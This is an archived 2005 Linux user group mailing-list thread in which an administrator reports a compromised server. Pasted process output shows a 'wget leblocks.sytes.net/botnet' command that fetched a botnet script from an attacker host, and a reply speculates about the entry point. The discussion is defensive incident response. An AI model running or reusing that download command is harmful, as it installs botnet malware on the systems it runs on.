l i n u x - u s e r s - g r o u p - o f - d a v i s
L U G O D
 
Next Meeting:
November 4: Social gathering
Next Installfest:
TBD
Latest News:
Oct. 10: LUGOD Installfests coming again soon
Page last updated:
2005 Feb 15 13:02

The following is an archive of a post made to our 'vox-tech mailing list' by one of its subscribers.

Report this post as spam:

(Enter your email address)
Re: [vox-tech] lugod.org cracked?
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [vox-tech] lugod.org cracked?



Most common trojan/exploit is for irc relays.

Guess for entry? Did you upgrade php and apache after those security holes
were found a while back?

could you send me a copy of the binary files you have found in
/tmp/.image? (Thanks.)

-ME

Rod Roark said:
> I found that something was sucking up all my bandwidth late
> this morning.  ps -aux showed this:
>
> apache    3267  0.0  0.0   2560  1024 ?        S    11:14   0:00 sh -c
> wget leblocks.sytes.net/botnet | grep abcdeee 2>&1 3>&1
> apache    3268  0.0  0.1   3060  1460 ?        S    11:14   0:00 wget
> leblocks.sytes.net/botnet
> apache    3269  0.0  0.0   1416   448 ?        S    11:14   0:00 grep
> abcdeee
>
> After killing all processes owned by apache and doing a bit
> of checking around, I found these perl scripts in
> /tmp/.images:
>
> -rw-r--r--   1 apache apache 20281 Feb 15 12:13 botnet
> -rw-r--r--   1 apache apache  9592 Oct 12 23:23 pv
> -rw-r--r--   1 apache apache  9592 Oct 12 23:23 pv.1
>
> They are definitely malicious.  Does anyone know what this
> malware is?
>
> -- Rod
> _______________________________________________
> vox-tech mailing list
> vox-tech@lists.lugod.org
> http://lists.lugod.org/mailman/listinfo/vox-tech
>
>

_______________________________________________
vox-tech mailing list
vox-tech@lists.lugod.org
http://lists.lugod.org/mailman/listinfo/vox-tech



LinkedIn
LUGOD Group on LinkedIn
Sign up for LUGOD event announcements
Your email address:
facebook
LUGOD Group on Facebook
'Like' LUGOD on Facebook:

Hosting provided by:
Sunset Systems
Sunset Systems offers preconfigured Linux systems, remote system administration and custom software development.

LUGOD: Linux Users' Group of Davis
PO Box 2082, Davis, CA 95617
Contact Us

LUGOD is a 501(c)7 non-profit organization
based in Davis, California
and serving the Sacramento area.
"Linux" is a trademark of Linus Torvalds.

Sponsored in part by:
O'Reilly and Associates
For numerous book donations.